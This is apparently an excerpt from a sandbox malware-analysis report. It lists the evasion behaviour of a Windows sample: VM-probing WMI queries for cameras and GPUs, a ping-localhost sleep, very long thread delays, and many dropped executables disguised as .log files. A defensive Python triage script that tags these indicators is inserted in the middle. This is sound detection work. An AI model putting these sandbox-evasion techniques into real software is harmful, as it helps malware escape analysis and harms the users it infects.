                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          Source: C:\Windows\System32\schtasks.exe  WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                          Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera') (24 identical rows)
Source: C:\Windows\System32\schtasks.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost (2 identical rows)
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Memory allocated: 920000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Memory allocated: 1A640000 memory reserve | memory write watch
Source: C:\Recovery\conhost.exe | Memory allocated: 1200000 memory reserve | memory write watch
Source: C:\Recovery\conhost.exe | Memory allocated: 1AE80000 memory reserve | memory write watch
Source: C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe | Memory allocated: 1170000 memory reserve | memory write watch
Source: C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe | Memory allocated: 1AC90000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Memory allocated: F00000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Memory allocated: 1A990000 memory reserve | memory write watch
Source: C:\Program Files\Google\Chrome\Application\conhost.exe | Memory allocated: F60000 memory reserve | memory write watch
Source: C:\Program Files\Google\Chrome\Application\conhost.exe | Memory allocated: 1AD60000 memory reserve | memory write watch
Source: C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe | Memory allocated: 1140000 memory reserve | memory write watch
Source: C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe | Memory allocated: 1B030000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Memory allocated: E10000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Memory allocated: 1AB50000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (24 identical rows)
Source: C:\Recovery\conhost.exe | Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe | Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Google\Chrome\Application\conhost.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe | Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Thread delayed: delay time (ms), 59 rows in the order observed: 600000, 599796, 3600000, 598718, 597828, 597375, 596468, 595281, 594790, 594576, 593531, 591343, 590953, 589509, 588812, 588461, 588136, 587593, 587350, 587166, 586900, 586468, 586174, 300000, 585871, 584340, 584166, 583975, 583656, 583425, 583305, 582187, 581949, 581629, 581455, 581232, 580961, 580801, 580604, 580095, 579637, 579159, 578796, 578578, 578328, 577135, 576812, 576343, 575968, 575489, 573886, 572540, 572203, 571968, 571754, 571562, 571234, 571039, 570920
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (12 identical rows)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed, 12 rows in the order observed: 1301, 1315, 1299, 1984, 1834, 1780, 1182, 1355, 1477, 1223, 1299, 1254
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Window / User API: threadDelayed 874
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed, 12 rows in the order observed: 1024, 768, 937, 740, 1032, 814, 840, 867, 982, 842, 773, 783
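The rows above (camera and video-controller WMI queries, the `ping -n 10 localhost` sleep, the write-watch reservations and the thread delays) are what a responder has to rank. The following triage script is an added example and is not part of the Joe Sandbox report or of the sample's own code: it parses rows in this section's layout, collapses identical rows into counts, and tags each row with the evasion indicator it evidences. The sample rows are constructed from the rows of this report; the tag names, the 5-minute long-sleep threshold, the VM-probe class list and the "unexpected issuer" list are this script's own assumptions. Two facts it encodes are worth stating plainly: 922337203685477 ms is Int64.MaxValue ticks / 10000, i.e. TimeSpan.MaxValue, so those waits are indefinite blocks rather than timed anti-sandbox sleeps; and the legitimate schtasks.exe has no reason to enumerate cameras or GPUs, so that attribution is the anomaly to pivot on.

```python
"""Triage the 'Malware Analysis System Evasion' rows of a sandbox report.

Added example: the row layout follows the report above, while the tags,
thresholds and issuer list are this script's own assumptions.
"""
import re
from collections import Counter, defaultdict
from dataclasses import dataclass

# Int64.MaxValue ticks / 10_000 ticks per ms == TimeSpan.MaxValue in ms (922337203685477):
# a wait of this length is an indefinite block, not a timed anti-sandbox sleep.
INFINITE_WAIT_MS = (2**63 - 1) // 10_000
LONG_SLEEP_MS = 5 * 60 * 1000          # assumed threshold; sandbox budgets are a few minutes
# WMI classes enumerated to tell a VM from a real desktop (assumed list, not exhaustive).
VM_PROBE_CLASSES = {"win32_pnpentity", "win32_videocontroller"}
# Windows utilities that never enumerate cameras or GPUs themselves (assumed list).
UNEXPECTED_WMI_ISSUERS = {"schtasks.exe", "cmd.exe", "conhost.exe", "ping.exe"}

CATEGORIES = ("WMI Queries", "Process created", "Thread delayed", "Memory allocated",
              "Window / User API", "Process information set",
              "Dropped PE file which has not been started")
# Accepts both the fused form ("...exeWMI Queries:") and a "path | category:" form, and
# drops the "Jump to behavior" / "Jump to dropped file" link residue from the report.
ROW_RE = re.compile(
    r"^Source:\s*(?P<src>.+?\.exe)\s*\|?\s*(?P<cat>"
    + "|".join(re.escape(c) for c in CATEGORIES)
    + r"):\s*(?P<detail>.*?)\s*(?:Jump to (?:behavior|dropped file))?\s*$")
WMI_RE = re.compile(r"FROM\s+(?P<cls>Win32_\w+)", re.IGNORECASE)
PING_RE = re.compile(r"\bping(?:\.exe)?\s+-n\s+(?P<n>\d+)\s+(?P<host>localhost|127\.0\.0\.1)\b",
                     re.IGNORECASE)
DELAY_RE = re.compile(r"delay time:\s*(?P<ms>\d+)")
THREAD_DELAYED_RE = re.compile(r"threadDelayed\s+(?P<n>\d+)")


@dataclass(frozen=True)
class Row:
    source: str
    category: str
    detail: str

    @property
    def image(self) -> str:
        """Basename of the issuing process, lower-cased for grouping."""
        return self.source.rsplit("\\", 1)[-1].lower()


def parse_row(line):
    """Parse one report row; returns None for headings and other non-row text."""
    m = ROW_RE.match(line.strip())
    return Row(m["src"], m["cat"], m["detail"]) if m else None


def classify(row):
    """Tag one row with the evasion indicators it evidences (tag names are this script's)."""
    tags = []
    if row.category == "WMI Queries":
        m = WMI_RE.search(row.detail)
        cls = m["cls"].lower() if m else ""
        if cls in VM_PROBE_CLASSES:
            tags.append(f"vm-probe:{cls}")
            if row.image in UNEXPECTED_WMI_ISSUERS:   # the real utility never does this
                tags.append(f"unexpected-issuer:{row.image}")
    elif row.category == "Process created":
        m = PING_RE.search(row.detail)
        if m:   # ping waits ~1 s between echo requests, so -n N to loopback idles ~N-1 s
            tags.append(f"ping-sleep:{int(m['n']) - 1}s")
    elif row.category == "Thread delayed":
        m = DELAY_RE.search(row.detail)
        ms = int(m["ms"]) if m else 0
        if ms >= INFINITE_WAIT_MS:
            tags.append("infinite-wait")
        elif ms >= LONG_SLEEP_MS:
            tags.append(f"long-sleep:{ms // 60_000}min")
    elif row.category == "Memory allocated" and "write watch" in row.detail:
        tags.append("write-watch")   # every .NET process in the report shows this pair; weak alone
    elif row.category == "Window / User API":
        m = THREAD_DELAYED_RE.search(row.detail)
        if m and int(m["n"]) >= 500:
            tags.append(f"sleep-loop:{m['n']}")
    elif row.category == "Dropped PE file which has not been started":
        tags.append("dropped-unstarted-pe")
    return tags


def triage(lines):
    """Collapse identical rows into counts and roll the tags up per issuing image."""
    rows = Counter(r for r in map(parse_row, lines) if r)
    per_image = defaultdict(Counter)
    for row, n in rows.items():
        for tag in classify(row):
            per_image[row.image][tag] += n
    return {img: dict(tags) for img, tags in per_image.items()}, rows


# Constructed sample: a handful of rows in the report's own layout, including the
# fused-cell form and the trailing link residue, so the parser is exercised on both.
SAMPLE_ROWS = [
    r"Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')",
] * 3 + [
    r"Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')",
    r"Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController",
    r"Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost",
    r"Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost",
    r"Source: C:\Users\user\Desktop\3XtEci4Mmo.exeMemory allocated: 920000 memory reserve | memory write watchJump to behavior",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477",
    r"Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 3600000",
    r"Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 600000",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1301Jump to behavior",
    r"Source: C:\Users\user\Desktop\3XtEci4Mmo.exeDropped PE file which has not been started: C:\Users\user\Desktop\ucDhZRLu.logJump to dropped file",
]

if __name__ == "__main__":
    summary, rows = triage(SAMPLE_ROWS)
    for image, tags in sorted(summary.items()):
        print(image, tags)
```

Run it on a full row export rather than the constructed sample to get per-image counts. The design choice is to tag per unique row and multiply by its count, so 24 copies of one camera query become one finding with a weight of 24 instead of 24 findings; the "write-watch" and "infinite-wait" tags are kept deliberately low-value because, as the rows above show, every .NET process and every PowerShell instance in this run produces them.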
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\qwPLRqWX.log
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\ucDhZRLu.log
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\ThILVSlx.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\FAtHPtxq.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\ZrGvzZJn.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\QWdyfgGf.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\udiCoAET.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\QXRfkjyW.log
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\dVnCFeff.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\xLpaQOdH.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\tmGCYmXQ.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\wFqSLbvP.log
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\zhcyQjUk.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\bQGwUejE.log
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\rmNqRUKB.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\QImfPxDF.log
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\bcXTThuh.log
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\BargBgFj.log
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\LBbeHZkL.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\sTDIJUfq.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\EVQZcBiW.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\XQlMiBJi.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\WBPEscIu.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\sRYTiegb.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\LCxGrujI.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\TfOoGCsS.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\rNFADhxz.log
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\OlTNIjCM.log
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\WgiUHyMw.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\jGLeSKCo.log
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\VkvurCps.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\yUQAQjKk.log
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\Zallyypm.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\pKSShysD.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\kOdTVPKT.log
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\KVHoAvPS.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\HDgqkcCm.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\FizIvULx.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\QujYzohZ.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\npJJQJjz.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\RGOnlxSA.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\EEJGOfpT.log
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\twjrRmqB.log
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\mzvrpXvN.log
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\HTUGeMKX.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\AfaiVEic.log
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\pyJigHPD.log
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\afwLyhfm.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\lnWbuaeE.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\RmrNprNr.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\exStwvKV.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\UXWdwFYk.log
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\mHfKTHWS.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\VZRFxCWH.log
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\xfqPuAPp.log
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\gPpSweJV.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\BwYQnKCg.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\SDpvGwhv.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\SYQgAPKa.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\SingkCdX.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\BnpyIbbb.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\NPXweASH.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\swyioMDw.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\XjnFxUBI.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\kHClnwJL.log
